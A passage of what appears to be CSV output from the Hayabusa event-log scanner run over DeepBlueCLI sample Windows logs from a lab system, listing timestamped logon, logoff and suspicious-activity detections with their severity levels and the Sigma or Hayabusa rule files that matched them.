IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xcf564 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:54:52.158 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xcf598 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:54:52.158 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0xcf564,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:55:06.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 06:55:06.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 06:57:07.814 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:23:56.107 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:23:56.107 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:23:56.575 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:26:20.278 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:35:01.091 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0xcf598,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:38:14.156 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:38:14.156 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:38:20.765 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:38:22.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 07:38:26.183 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:38:26.183 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:38:26.183 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:38:48.104 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:38:48.104 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x27008 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:38:48.104 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x27038 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:38:48.104 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x27008,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:40:33.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 07:40:33.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 07:48:51.643 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x27038,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:50:56.046 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:50:56.046 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:51:16.890 +09:00,IE9Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:51:22.000 +09:00,IE9WIN7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 07:51:29.601 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:51:29.601 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:51:29.601 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:51:34.460 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IE9WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:51:34.460 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x12048 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:51:34.460 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x12070 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:51:34.460 +09:00,IE9Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x12048,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:56:09.000 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 07:56:09.000 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 08:03:14.476 +09:00,IE9Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x12070,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:34:44.156 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:34:44.156 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:34:54.687 +09:00,IE9Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:34:59.000 +09:00,IE9WIN7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 02:35:04.667 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:35:04.667 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:35:04.667 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:35:09.745 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IE9WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:35:09.745 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x131c3 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:35:09.745 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x13216 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:35:09.745 +09:00,IE9Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x131c3,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:35:57.635 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:38:06.000 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 02:38:06.000 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 02:41:21.932 +09:00,IE9Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x13216,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:43:17.671 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:43:17.671 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:43:31.734 +09:00,IE9Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:43:40.000 +09:00,IE9Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 02:43:56.893 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:43:56.893 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:43:56.893 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:44:39.689 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IE9WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:44:39.689 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x36aed : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:44:39.689 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x36b1d : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:44:39.689 +09:00,IE9Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x36aed,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:46:03.000 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 02:46:03.000 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 02:59:00.431 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:59:00.431 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:59:00.431 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:15:07.962 +09:00,IE9Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x36b1d,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:15:39.306 +09:00,IE9Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 03:16:49.390 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 03:16:49.390 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 03:17:04.250 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:17:08.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 03:17:13.369 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 03:17:13.369 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 03:17:13.369 +09:00,IE10Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:17:19.150 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:17:19.150 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x11c02 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:17:19.150 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x11c32 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:17:19.150 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x11c02,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:20:34.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 03:20:34.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 03:30:25.009 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x11c32,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:21:46.785 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:21:48.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 08:21:50.498 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:21:50.498 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x170f5 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:21:50.498 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x17125 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:21:50.498 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x170f5,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:23:59.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 08:23:59.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 08:24:45.552 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 08:24:45.552 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 08:25:04.605 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x17125,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:25:51.420 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:25:54.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 08:25:55.414 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:25:55.414 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1ac86 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:25:55.414 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1b245 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:25:55.414 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1ac86,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:26:40.560 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1b245,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-29 00:46:09.645 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-29 00:46:10.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-29 00:46:12.437 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-29 00:46:12.437 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1a23a : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-29 00:46:12.437 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1a265 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-29 00:46:12.437 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1a23a,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-29 00:48:19.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-29 00:48:19.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-29 00:48:19.456 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1a265,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 23:46:21.297 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 23:46:21.297 +09:00,IE10Win7,1,high,Execution Of Other File Type Than 